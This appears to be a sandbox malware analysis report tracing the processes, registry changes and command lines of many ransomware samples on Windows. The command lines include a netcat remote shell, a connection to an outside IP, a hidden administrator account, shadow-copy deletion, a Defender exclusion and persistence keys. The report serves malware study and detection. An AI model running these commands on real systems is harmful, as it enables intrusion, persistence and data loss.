2520 | HEUR-Trojan-Ransom.Win32.KlopRansom.gen-ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73.exe
2184 | HEUR-Trojan-Ransom.MSIL.Gen.gen-886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0.exe
2184 | HEUR-Trojan-Ransom.MSIL.Gen.gen-886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0.exe
1616 | mspaint.exe
1616 | mspaint.exe
1616 | mspaint.exe
1616 | mspaint.exe
1616 | mspaint.exe
5656 | VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe
3064 | taskmgr.exe
6764 | VHO-Trojan-Ransom.Win32.Convagent.gen-ceb44492510d44d5bc712a41e1f4da9f5e222647b7a0f9a55db5c8cfcf024f59.exe
6764 | VHO-Trojan-Ransom.Win32.Convagent.gen-ceb44492510d44d5bc712a41e1f4da9f5e222647b7a0f9a55db5c8cfcf024f59.exe
7120 | key6.exe
8248 | UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe
8248 | UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe
8248 | UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe
8248 | UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe
3064 | taskmgr.exe
3064 | taskmgr.exe
3064 | taskmgr.exe
3064 | taskmgr.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target | count
PID 4376 wrote to memory of 3064 | 4376 | taskmgr.exe | 98 | 2
PID 2368 wrote to memory of 2504 | 2368 | powershell.exe | 104 | 2
PID 2504 wrote to memory of 1712 | 2504 | cmd.exe | 105 | 2
PID 2504 wrote to memory of 2184 | 2504 | cmd.exe | 106 | 2
PID 2504 wrote to memory of 2156 | 2504 | cmd.exe | 107 | 3
PID 2504 wrote to memory of 1088 | 2504 | cmd.exe | 110 | 3
PID 2504 wrote to memory of 1484 | 2504 | cmd.exe | 112 | 3
PID 2504 wrote to memory of 1080 | 2504 | cmd.exe | 157 | 3
PID 2504 wrote to memory of 2520 | 2504 | cmd.exe | 114 | 3
PID 2504 wrote to memory of 3428 | 2504 | cmd.exe | 115 | 3
PID 2504 wrote to memory of 440 | 2504 | cmd.exe | 117 | 3
PID 2504 wrote to memory of 1064 | 2504 | cmd.exe | 118 | 3
PID 3428 wrote to memory of 3200 | 3428 | Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe | 140 | 3
PID 440 wrote to memory of 4972 | 440 | Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe | 122 | 5
PID 1064 wrote to memory of 4248 | 1064 | Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe | 123 | 3
PID 1064 wrote to memory of 3596 | 1064 | Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe | 124 | 3
PID 2504 wrote to memory of 2516 | 2504 | cmd.exe | 126 | 3
PID 3596 wrote to memory of 1664 | 3596 | cmd.exe | 127 | 3
PID 3428 wrote to memory of 3300 | 3428 | Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe | 128 | 3
PID 4972 wrote to memory of 1704 | 4972 | Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe | 131 | 3
PID 4972 wrote to memory of 4780 | 4972 | Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe | 132 | 5
PID 2504 wrote to memory of 4444 | 2504 | cmd.exe | 134 | 1
(identical rows collapsed; the count column gives the number of WriteProcessMemory events per row, 64 in total)
System policy modification 1 TTPs 4 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer | Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\LockTaskbar = "1" | Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe
EnableLUA = 0 switches User Account Control off machine-wide (it takes full effect at the next reboot), which is why the same sample is also tagged "UAC bypass" and "Checks whether UAC is enabled" in the process tree; LockTaskbar = 1 is a user-lockdown policy that pins the taskbar.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots. Ransomware deletes the existing shadow copies, either through this COM API or by running vssadmin delete shadows /all /quiet (several samples in the process tree do the latter), so that encrypted files cannot be restored from a previous version.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid | Process
3028 | attrib.exe
8484 | attrib.exe
outlook_office_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe
outlook_win_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe
Processes
Tree notation: [n] is the nesting depth, the first path is the image, "cmd:" is the command line, and the "-" lines beneath are the signatures the sandbox attached to that process.

[1] PID 812  C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p
  [2] PID 4600  C:\Windows\System32\rundll32.exe
      cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  [2] PID 2332  C:\Windows\explorer.exe
      cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      - Modifies registry class
    [3] PID 1616  C:\Windows\system32\mspaint.exe
        cmd: "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\00424\Trojan-Ransom.bmp"
        - Suspicious use of SetWindowsHookEx

[1] PID 3492  C:\Windows\Explorer.EXE
    cmd: C:\Windows\Explorer.EXE
  [2] PID 428  C:\Program Files\7-Zip\7zFM.exe
      cmd: "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00424.7z"
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
  [2] PID 4376  C:\Windows\system32\taskmgr.exe
      cmd: "C:\Windows\system32\taskmgr.exe" /4
      - Checks SCSI registry key(s)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory
    [3] PID 3064  C:\Windows\system32\taskmgr.exe
        cmd: "C:\Windows\system32\taskmgr.exe" /1
        - Suspicious use of NtCreateProcessExOtherParentProcess
        - Enumerates connected drives
        - Checks SCSI registry key(s)
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: GetForegroundWindowSpam
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of SetWindowsHookEx
      [4] PID 2872  C:\Windows\system32\NOTEPAD.EXE
          cmd: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\DKHMRCDXTJ-MANUAL.txt
      [4] PID 10120  C:\Windows\system32\NOTEPAD.EXE
          cmd: "C:\Windows\system32\NOTEPAD.EXE" C:\RETURN FILES.txt
      [4] PID 7220  C:\Windows\system32\NOTEPAD.EXE
          cmd: "C:\Windows\system32\NOTEPAD.EXE" C:\HOW-TO-DECRYPT-jjj9b.txt
  [2] PID 2368  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] PID 2504  C:\Windows\system32\cmd.exe
        cmd: "C:\Windows\system32\cmd.exe"
        - Suspicious use of WriteProcessMemory
      [4] PID 1712  C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Blocker.gen-388a6625b398cbfbd4d915b8165b37ebba259fe9ef89a6bbef5ca9677b42ed52.exe
          cmd: HEUR-Trojan-Ransom.MSIL.Blocker.gen-388a6625b398cbfbd4d915b8165b37ebba259fe9ef89a6bbef5ca9677b42ed52.exe
          - Executes dropped EXE
      [4] PID 2184  C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Gen.gen-886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0.exe
          cmd: HEUR-Trojan-Ransom.MSIL.Gen.gen-886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0.exe
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
      [4] PID 2156  C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Makop.gen-0ed05e4be5376f0cf391a78afc7a3114ffbfa064348fb66cd93e8ee6f6b27fe1.exe
          cmd: HEUR-Trojan-Ransom.MSIL.Makop.gen-0ed05e4be5376f0cf391a78afc7a3114ffbfa064348fb66cd93e8ee6f6b27fe1.exe
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious use of AdjustPrivilegeToken
      [4] PID 1088  C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe
          cmd: HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
          - Suspicious use of AdjustPrivilegeToken
        [5] PID 7820  C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe
            cmd: "C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe"
            - Executes dropped EXE
        [5] PID 5732  C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe
            cmd: "C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe"
            - Checks computer location settings
            - Executes dropped EXE
            - Modifies system executable filetype association
            - Drops file in Program Files directory
            - System Location Discovery: System Language Discovery
            - Modifies registry class
          [6] PID 8584  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
              cmd: "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"'
              - Command and Scripting Interpreter: PowerShell
              - System Location Discovery: System Language Discovery
              - Suspicious use of AdjustPrivilegeToken
      [4] PID 1484  C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Petr.gen-164a86e099913008bebcd659331c1033c4afd97af2a15cca3a35765bca504be9.exe
          cmd: HEUR-Trojan-Ransom.MSIL.Petr.gen-164a86e099913008bebcd659331c1033c4afd97af2a15cca3a35765bca504be9.exe
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
      [4] PID 1080  C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Thanos.gen-68cfd9eeb25aebc7a65c5c72b8426edc88865ec13732374ba5dda877107bfe6a.exe
          cmd: HEUR-Trojan-Ransom.MSIL.Thanos.gen-68cfd9eeb25aebc7a65c5c72b8426edc88865ec13732374ba5dda877107bfe6a.exe
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
      [4] PID 2520  C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.Win32.KlopRansom.gen-ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73.exe
          cmd: HEUR-Trojan-Ransom.Win32.KlopRansom.gen-ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73.exe
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious use of SetWindowsHookEx
      [4] PID 3428  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe
          cmd: Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe
          - Modifies firewall policy service
          - UAC bypass
          - Disables RegEdit via registry modification
          - Drops file in Drivers directory
          - Checks computer location settings
          - Executes dropped EXE
          - Adds Run key to start application
          - Checks whether UAC is enabled
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          - System policy modification
        [5] PID 3200  C:\Users\Admin\AppData\Local\ncarchive.rar.exe
            cmd: "C:\Users\Admin\AppData\Local\ncarchive.rar.exe" -dC:\Users\Admin\AppData\Local\ -ppassword -s
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
        [5] PID 3300  C:\Windows\SysWOW64\netsh.exe
            cmd: "C:\Windows\system32\netsh.exe" firewall add allowedprogram C:\Users\Admin\AppData\Local\nc.exe RemoteSupport ENABLE
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL
            - System Location Discovery: System Language Discovery
        [5] PID 4740  C:\Users\Admin\AppData\Local\nc.exe
            cmd: "C:\Users\Admin\AppData\Local\nc.exe" -L -p 53 -e cmd.exe
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
        [5] PID 2976  C:\Users\Admin\AppData\Local\nc.exe
            cmd: "C:\Users\Admin\AppData\Local\nc.exe" 150.70.162.115 80
            - Executes dropped EXE
        [5] PID 4368  C:\Windows\SysWOW64\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c Net User dmatio dmatio /add
          [6] PID 7544  C:\Windows\SysWOW64\net.exe
              cmd: Net User dmatio dmatio /add
              - System Location Discovery: System Language Discovery
            [7] PID 8500  C:\Windows\SysWOW64\net1.exe
                cmd: C:\Windows\system32\net1 User dmatio dmatio /add
                - System Location Discovery: System Language Discovery
        [5] PID 408  C:\Windows\SysWOW64\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c Net Localgroup Administrators dmatio /add
            - System Location Discovery: System Language Discovery
          [6] PID 8776  C:\Windows\SysWOW64\net.exe
              cmd: Net Localgroup Administrators dmatio /add
              - System Location Discovery: System Language Discovery
            [7] PID 5192  C:\Windows\SysWOW64\net1.exe
                cmd: C:\Windows\system32\net1 Localgroup Administrators dmatio /add
                - System Location Discovery: System Language Discovery
      [4] PID 440  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe
          cmd: Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious use of WriteProcessMemory
        [5] PID 4972  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe
            cmd: "C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe"
            - Checks computer location settings
            - Executes dropped EXE
            - Adds Run key to start application
            - Suspicious use of SetThreadContext
            - Suspicious use of WriteProcessMemory
          [6] PID 1704  C:\Windows\SysWOW64\cmd.exe
              cmd: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00424\tmp.bat" "
              - System Location Discovery: System Language Discovery
            [7] PID 2896  C:\Windows\SysWOW64\PING.EXE
                cmd: ping -n 1 localhost
                - System Network Configuration Discovery: Internet Connection Discovery
                - Runs ping.exe
          [6] PID 4780  C:\Windows\SysWOW64\svchost.exe
              cmd: "C:\Windows\system32\svchost.exe"
              - Adds Run key to start application
              - Suspicious use of SetThreadContext
              - System Location Discovery: System Language Discovery
              - Suspicious use of AdjustPrivilegeToken
            [7] PID 2788  C:\Windows\SysWOW64\svchost.exe
                cmd: "C:\Windows\system32\svchost.exe" __OwningControllerProcess 4780
                - System Location Discovery: System Language Discovery
      [4] PID 1064  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe
          cmd: Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory
        [5] PID 4248  C:\Windows\SysWOW64\explorer.exe
            cmd: explorer.exe Trojan-Ransom.bmp
            - System Location Discovery: System Language Discovery
        [5] PID 3596  C:\Windows\SysWOW64\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c airzvp.bat > nul
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
          [6] PID 1664  C:\Windows\SysWOW64\reg.exe
              cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v svechosts /t REG_SZ /d C:\Users\Admin\AppData\Roaming\svechosts.exe /f
              - Adds Run key to start application
              - System Location Discovery: System Language Discovery
          [6] PID 2812  C:\Windows\SysWOW64\schtasks.exe
              cmd: schtasks /CREATE /SC Minute /MO 1 /TR C:\Users\Admin\AppData\Roaming\svechosts.exe /TN svechosts /F
              - System Location Discovery: System Language Discovery
              - Scheduled Task/Job: Scheduled Task
      [4] PID 2516  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.lyiu-985b67a88f7fc9935704c7c18ecb4a7d077fb02c658a9d3fcfec9439776564d5.exe
          cmd: Trojan-Ransom.Win32.Blocker.lyiu-985b67a88f7fc9935704c7c18ecb4a7d077fb02c658a9d3fcfec9439776564d5.exe
          - Checks computer location settings
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
        [5] PID 1448  C:\Users\Admin\AppData\Roaming\AdobeART.exe
            cmd: "C:\Users\Admin\AppData\Roaming\AdobeART.exe"
            - Executes dropped EXE
            - Adds Run key to start application
      [4] PID 4444  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.mvrm-4138c885d1abbe86b0a700b1ff8489932b25c3fb3feaed4bb60f269d80ef22d4.exe
          cmd: Trojan-Ransom.Win32.Blocker.mvrm-4138c885d1abbe86b0a700b1ff8489932b25c3fb3feaed4bb60f269d80ef22d4.exe
          - Checks computer location settings
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
        [5] PID 3200  C:\Users\Admin\AppData\Local\Temp\hack.exe
            cmd: "C:\Users\Admin\AppData\Local\Temp\hack.exe"
            - Checks computer location settings
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
          [6] PID 1332  C:\Windows\SysWOW64\cmd.exe
              cmd: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\key1.bat" "
              - System Location Discovery: System Language Discovery
            [7] PID 1900  C:\Users\Admin\AppData\Local\Temp\key7.exe
                cmd: key7.exe -p3215295617s -dC:\Users\Admin\AppData\Local\Temp
                - Checks computer location settings
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
              [8] PID 6348  C:\Users\Admin\AppData\Local\Temp\key6.exe
                  cmd: "C:\Users\Admin\AppData\Local\Temp\key6.exe"
                  - Executes dropped EXE
                  - System Location Discovery: System Language Discovery
                [9] PID 7120  C:\Users\Admin\AppData\Local\Temp\key6.exe
                    cmd: "C:\Users\Admin\AppData\Local\Temp\key6.exe"
                    - Executes dropped EXE
                    - Loads dropped DLL
                    - System Location Discovery: System Language Discovery
                    - Suspicious use of SetWindowsHookEx
                  [10] PID 2944  C:\Windows\SysWOW64\cmd.exe
                      cmd: C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v winexplorer /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe""
                      - System Location Discovery: System Language Discovery
                    [11] PID 5176  C:\Windows\SysWOW64\reg.exe
                        cmd: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v winexplorer /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe"
                        - System Location Discovery: System Language Discovery
                        - Modifies registry key
      [4] PID 2852  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crusis.dqg-79b8c026d2e90a16b4a585f38be231828bc9d52255948d4a7d9248bb25e882d1.exe
          cmd: Trojan-Ransom.Win32.Crusis.dqg-79b8c026d2e90a16b4a585f38be231828bc9d52255948d4a7d9248bb25e882d1.exe
          - Executes dropped EXE
        [5] PID 9168  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crusis.dqg-79b8c026d2e90a16b4a585f38be231828bc9d52255948d4a7d9248bb25e882d1.exe
            cmd: C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crusis.dqg-79b8c026d2e90a16b4a585f38be231828bc9d52255948d4a7d9248bb25e882d1.exe
          [6] PID 5604  C:\Windows\system32\cmd.exe
              cmd: "C:\Windows\system32\cmd.exe"
            [7] PID 7776  C:\Windows\System32\Conhost.exe
                cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            [7] PID 5336  C:\Windows\system32\mode.com
                cmd: mode con cp select=1251
            [7] PID 6236  C:\Windows\system32\vssadmin.exe
                cmd: vssadmin delete shadows /all /quiet
                - Interacts with shadow copies
          [6] PID 9552  C:\Windows\system32\cmd.exe
              cmd: "C:\Windows\system32\cmd.exe"
            [7] PID 8216  C:\Windows\system32\mode.com
                cmd: mode con cp select=1251
            [7] PID 8468  C:\Windows\system32\vssadmin.exe
                cmd: vssadmin delete shadows /all /quiet
                - Interacts with shadow copies
      [4] PID 4068  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe
          cmd: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe
          - Checks computer location settings
          - Drops startup file
          - Executes dropped EXE
          - Enumerates connected drives
          - Sets desktop wallpaper using registry
          - Drops file in Program Files directory
          - System Location Discovery: System Language Discovery
          - Checks processor information in registry
        [5] PID 2628  C:\Windows\SysWOW64\cmd.exe
            cmd: "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
            - System Location Discovery: System Language Discovery
      [4] PID 4020  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
          cmd: Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
          - Executes dropped EXE
        [5] PID 100  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
            cmd: Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
            - Drops file in Drivers directory
            - Drops startup file
            - Executes dropped EXE
            - Loads dropped DLL
            - Drops file in System32 directory
            - Drops file in Program Files directory
            - Drops file in Windows directory
            - System Location Discovery: System Language Discovery
      [4] PID 1136  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.DoppelPaymer.bf-9d2ef7b5f84ee093e0e010add38917032d45008533472c6744c16c072f266f48.exe
          cmd: Trojan-Ransom.Win32.DoppelPaymer.bf-9d2ef7b5f84ee093e0e010add38917032d45008533472c6744c16c072f266f48.exe
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
        [5] PID 5796  C:\Windows\SysWOW64\WerFault.exe
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 444
            - Program crash
      [4] PID 3920  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe
          cmd: Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe
          - Executes dropped EXE
          - Adds Run key to start application
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
        [5] PID 6376  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe
            cmd: C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
          [6] PID 5536  C:\Users\Admin\AppData\Roaming\rundll32.exe
              cmd: "rundll32.exe"
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
            [7] PID 2360  C:\Windows\system32\svchost.exe
                cmd: C:\Windows\system32\svchost.exe -k
            [7] PID 7496  C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 652
                - Program crash
      [4] PID 2860  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe
          cmd: Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe
          - Executes dropped EXE
          - Enumerates connected drives
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
        [5] PID 9180  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe
            cmd: C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe
            - Executes dropped EXE
            - Adds Run key to start application
      [4] PID 2432  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe
          cmd: Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe
          - Checks computer location settings
          - Executes dropped EXE
          - Adds Run key to start application
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
          - Suspicious use of AdjustPrivilegeToken
        [5] PID 6044  C:\Users\Admin\AppData\Roaming\Microsoft\AVShieldPro.exe
            cmd: "C:\Users\Admin\AppData\Roaming\Microsoft\AVShieldPro.exe"
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - System Location Discovery: System Language Discovery
            - Suspicious use of AdjustPrivilegeToken
          [6] PID 5152  C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
              cmd: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
            [7] PID 2984  C:\Windows\SysWOW64\explorer.exe
                cmd: explorer.exe
